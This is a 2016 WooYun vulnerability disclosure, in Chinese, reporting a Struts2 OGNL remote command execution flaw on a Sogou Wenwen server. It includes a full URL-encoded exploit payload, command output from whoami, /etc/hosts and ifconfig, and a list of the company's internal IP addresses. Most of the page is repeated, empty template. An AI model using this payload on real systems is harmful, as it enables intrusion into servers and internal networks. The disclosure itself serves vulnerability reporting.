搜狗搜索(问问)存在远程命令执行漏洞(可穿透边界防火墙进入内网)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170574

漏洞标题：搜狗搜索(问问)存在远程命令执行漏洞(可穿透边界防火墙进入内网)

漏洞作者：猪猪侠

提交时间：2016-01-17 13:07

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-17：细节已通知厂商并且等待厂商处理中
2016-01-17：厂商已经确认，细节仅向厂商公开
2016-01-27：细节向核心白帽子及相关领域专家公开
2016-02-06：细节向普通白帽子公开
2016-02-16：细节向实习白帽子公开
2016-02-27：细节向公众公开

简要描述：

搜狗搜索(问问系统)(wenen.sogou.com)存在远程命令执行漏洞，可穿透边界防火墙进入内网，听说你们被腾讯搜狗了，在不在腾讯内网呢？

详细说明：

#1 漏洞描述(st2命令执行)
地址：http://mock.wenwen.sogou.com/org/index.do

漏洞证明：

#2 利用

http://mock.wenwen.sogou.com/org/index.do?redirect%3A%24%7B%23res%3D%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27)%2C%23res.setCharacterEncoding(%22UTF-8%22)%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ringzero%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B9%5D%2C%23d.read(%23e)%2C%23res.getWriter().println(%23e)%2C%23res.getWriter().flush()%2C%23res.getWriter().close()%7D

whoami
====================================================================================================================================
snswenwen
cat /etc/hosts
====================================================================================================================================
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4
::1         localhost localhost.localdomain localhost6 localhost6.localdomain6
10.134.9.45             sjs_9_45.sogou-in.domain        sjs_9_45
/sbin/ifconfig -a
====================================================================================================================================
eth0      Link encap:Ethernet  HWaddr 5C:F3:FC:A7:04:E8  
          inet addr:10.134.9.45  Bcast:10.134.15.255  Mask:255.255.248.0
          inet6 addr: fe80::5ef3:fcff:fea7:4e8/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:398187733 errors:0 dropped:0 overruns:0 frame:0
          TX packets:128375033 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:36697666297 (34.1 GiB)  TX bytes:20420497771 (19.0 GiB)
          Memory:92a60000-92a80000 
eth1      Link encap:Ethernet  HWaddr 5C:F3:FC:A7:04:E9  
          inet addr:10.144.9.45  Bcast:10.144.15.255  Mask:255.255.248.0
          inet6 addr: fe80::5ef3:fcff:fea7:4e9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1496542708 errors:0 dropped:0 overruns:0 frame:0
          TX packets:753954233 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:154726879148 (144.1 GiB)  TX bytes:178253899801 (166.0 GiB)
          Memory:92a20000-92a40000 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:171894323 errors:0 dropped:0 overruns:0 frame:0
          TX packets:171894323 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:24459559582 (22.7 GiB)  TX bytes:24459559582 (22.7 GiB)
usb0      Link encap:Ethernet  HWaddr 5E:F3:FC:A7:04:EC  
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
? (10.144.15.252) at d8:67:d9:6e:5c:c1 [ether] on eth1
? (10.134.15.254) at 00:00:0c:07:ac:65 [ether] on eth0
? (10.134.15.250) at 70:e2:84:07:5a:ac [ether] on eth0
? (10.144.15.254) at 00:00:0c:07:ac:c9 [ether] on eth1

#3 发几个内网IP证明

#	IP
1	10.152.91.48
2	10.152.107.41
3	10.149.29.56
4	10.144.77.59
5	10.153.18.116
6	10.144.86.83

修复方案：

升级呗，难道关闭服务器不成？

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-01-17 20:59

厂商回复：

感谢支持

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170574

漏洞标题：搜狗搜索(问问)存在远程命令执行漏洞(可穿透边界防火墙进入内网)

相关厂商：搜狗

漏洞作者：猪猪侠

提交时间：2016-01-17 13:07

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170574

漏洞标题：搜狗搜索(问问)存在远程命令执行漏洞(可穿透边界防火墙进入内网)

相关厂商：搜狗

漏洞作者： 猪猪侠

提交时间：2016-01-17 13:07

修复时间：2016-02-27 11:49

公开时间：2016-02-27 11:49

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0170574"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：猪猪侠

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源猪猪侠@乌云